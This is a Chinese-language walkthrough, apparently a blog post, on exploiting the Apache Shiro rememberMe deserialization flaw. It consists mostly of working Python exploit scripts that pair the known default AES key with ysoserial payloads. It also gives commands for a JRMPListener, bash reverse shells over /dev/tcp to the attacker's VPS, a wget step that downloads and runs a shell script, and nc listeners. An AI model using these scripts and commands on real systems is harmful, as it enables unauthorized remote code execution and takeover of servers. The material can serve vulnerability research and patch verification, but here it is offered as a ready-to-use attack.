Apache Shiro漏洞复现
利用burp dns进行检测,脚本如下:
import sys import uuid import base64 import subprocess from Crypto.Cipher import AES import requests # copy to clipboard def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext if __name__ == '__main__': payload = encode_rememberme('http://xxx.burpcollaborator.net') print "rememberMe={0}".format(payload.decode()) target = 'http://xxx.com' r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10) print r.text
漏洞利用脚本如下:
import os import re import base64 import uuid import subprocess import requests import sys from Crypto.Cipher import AES def poc(url,rce_command): if '://' not in url: target = 'https://%s' % url if ':443' in url else 'http://%s' % url else: target = url payload = generator(rce_command) # try: #print "rememberMe={0}".format(payload.decode()) r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10) print r.text except Exception, e: pass # # return False def generator(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = "kPH+bIxk5D2deZiIxcaaaA==" mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) #print(base64_ciphertext) return base64_ciphertext if __name__ == '__main__': url = 'http://x.x.x.x:8071' cmd = 'x.x.x.x:443' poc(url,cmd)
在你的vps上使用如下payload进行反弹即可
linux反弹命令 bash -i >& /dev/xxxxxx.x/53 0>&1 base64编码 bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i} vps上执行,CommonsCollections也可以使用CommonsCollections2,CommonsCollections4 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 443 CommonsCollections1 'bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}' 监听反弹端口 nc -lvp 53
有时候直接反弹是不成功的。可以先下载然后执行。
/bin/bash -i >& /dev/tcp/*.*.*.*/2019 0>&1 将反弹shell的命令写成txt然后放在web目录下 开启web python -m SimpleHTTPServer 8080 执行下载命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'wget http://*.*.*.*:8080/1.txt' 执行反弹命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'sh 1.txt' 监听反弹端口 nc -lvv 2019